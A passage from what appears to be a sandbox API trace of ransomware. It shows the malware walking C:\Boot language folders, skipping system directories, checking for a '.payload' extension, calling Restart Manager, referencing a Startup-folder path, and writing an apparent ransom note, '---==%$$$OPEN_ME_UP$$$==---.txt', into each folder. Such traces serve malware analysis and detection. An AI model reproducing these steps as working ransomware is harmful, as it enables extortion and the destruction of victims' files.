(lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.022] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0070.022] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0070.022] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.023] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0070.023] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0070.023] RmStartSession () returned 0x0 [0070.025] RmRegisterResources () returned 0x0 [0070.030] RmGetList () returned 0x0 [0070.445] RmEndSession () returned 0x0 [0070.618] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0070.618] FindNextFileW (in: hFindFile=0x6061a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.618] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0070.618] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0070.618] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0070.618] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0070.618] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0070.618] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui") returned 33 [0070.618] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0070.618] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.618] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0070.618] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0070.618] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.619] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0070.619] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0070.619] RmStartSession () returned 0x0 [0070.622] RmRegisterResources () returned 0x0 [0070.626] RmGetList () returned 0x0 [0070.908] RmEndSession () returned 0x0 [0071.250] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0071.250] FindNextFileW (in: hFindFile=0x6061a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0071.250] FindClose (in: hFindFile=0x6061a0 | out: hFindFile=0x6061a0) returned 1 [0071.251] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0071.251] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\es-es\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0071.252] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0071.253] CloseHandle (hObject=0x430) returned 1 [0071.256] GetProcessHeap () returned 0x5e0000 [0071.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0071.256] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0071.256] lstrcmpiW (lpString1="es-MX", lpString2="Windows") returned -1 [0071.256] lstrcmpiW (lpString1="es-MX", lpString2="$Recycle.bin") returned 1 [0071.256] lstrcmpiW (lpString1="es-MX", lpString2="System Volume Information") returned -1 [0071.256] lstrcmpiW (lpString1="es-MX", lpString2="Program Files") returned -1 [0071.256] lstrcmpiW (lpString1="es-MX", lpString2="Program Files (x86)") returned -1 [0071.256] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX") returned 17 [0071.256] lstrcmpW (lpString1="es-MX", lpString2=".") returned 1 [0071.256] lstrcmpW (lpString1="es-MX", lpString2="..") returned 1 [0071.256] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-MX", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0071.257] GetProcessHeap () returned 0x5e0000 [0071.257] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0071.257] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\*") returned 19 [0071.257] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-MX\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606120 [0071.257] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.257] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.257] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.257] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.257] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.257] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\.") returned 19 [0071.257] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.257] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0071.257] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.257] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.257] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.257] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.257] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.257] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\..") returned 20 [0071.257] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.257] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.257] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0071.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0071.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0071.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0071.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0071.257] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 33 [0071.257] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0071.257] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0071.258] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0071.258] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0071.258] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.258] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0071.258] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0071.258] RmStartSession () returned 0x0 [0071.261] RmRegisterResources () returned 0x0 [0071.265] RmGetList () returned 0x0 [0071.754] RmEndSession () returned 0x0 [0071.904] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0071.904] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0071.904] FindClose (in: hFindFile=0x606120 | out: hFindFile=0x606120) returned 1 [0071.904] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0071.904] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\es-mx\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0071.905] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0071.905] CloseHandle (hObject=0x430) returned 1 [0071.906] GetProcessHeap () returned 0x5e0000 [0071.906] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0071.906] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0071.906] lstrcmpiW (lpString1="et-EE", lpString2="Windows") returned -1 [0071.906] lstrcmpiW (lpString1="et-EE", lpString2="$Recycle.bin") returned 1 [0071.906] lstrcmpiW (lpString1="et-EE", lpString2="System Volume Information") returned -1 [0071.906] lstrcmpiW (lpString1="et-EE", lpString2="Program Files") returned -1 [0071.906] lstrcmpiW (lpString1="et-EE", lpString2="Program Files (x86)") returned -1 [0071.906] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE") returned 17 [0071.906] lstrcmpW (lpString1="et-EE", lpString2=".") returned 1 [0071.906] lstrcmpW (lpString1="et-EE", lpString2="..") returned 1 [0071.906] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\et-EE", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0071.906] GetProcessHeap () returned 0x5e0000 [0071.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0071.906] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\*") returned 19 [0071.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\et-EE\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6065e0 [0071.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.906] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.906] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.906] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\.") returned 19 [0071.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.907] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0071.907] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.907] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.907] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.907] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.907] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.907] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\..") returned 20 [0071.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.907] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.907] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0071.907] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0071.907] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0071.907] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0071.907] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0071.907] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 33 [0071.907] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0071.907] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0071.907] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0071.907] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0071.907] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.908] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0071.908] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0071.908] RmStartSession () returned 0x0 [0071.910] RmRegisterResources () returned 0x0 [0071.915] RmGetList () returned 0x0 [0072.243] RmEndSession () returned 0x0 [0072.611] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0072.611] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0072.612] FindClose (in: hFindFile=0x6065e0 | out: hFindFile=0x6065e0) returned 1 [0072.612] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0072.612] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\et-ee\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.612] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0072.613] CloseHandle (hObject=0x430) returned 1 [0072.613] GetProcessHeap () returned 0x5e0000 [0072.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0072.613] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0072.613] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0072.613] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0072.613] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0072.613] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files") returned -1 [0072.613] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files (x86)") returned -1 [0072.613] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0072.613] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0072.613] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0072.613] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.614] GetProcessHeap () returned 0x5e0000 [0072.614] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0072.614] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0072.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606360 [0072.614] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.614] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.614] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.614] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.614] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.614] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0072.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.614] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.614] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.614] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.614] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.614] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.614] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0072.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.614] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0072.614] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0072.614] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0072.614] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0072.614] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0072.614] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0072.614] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0072.615] StrStrIW (lpFirst="bootmgr.exe.mui", 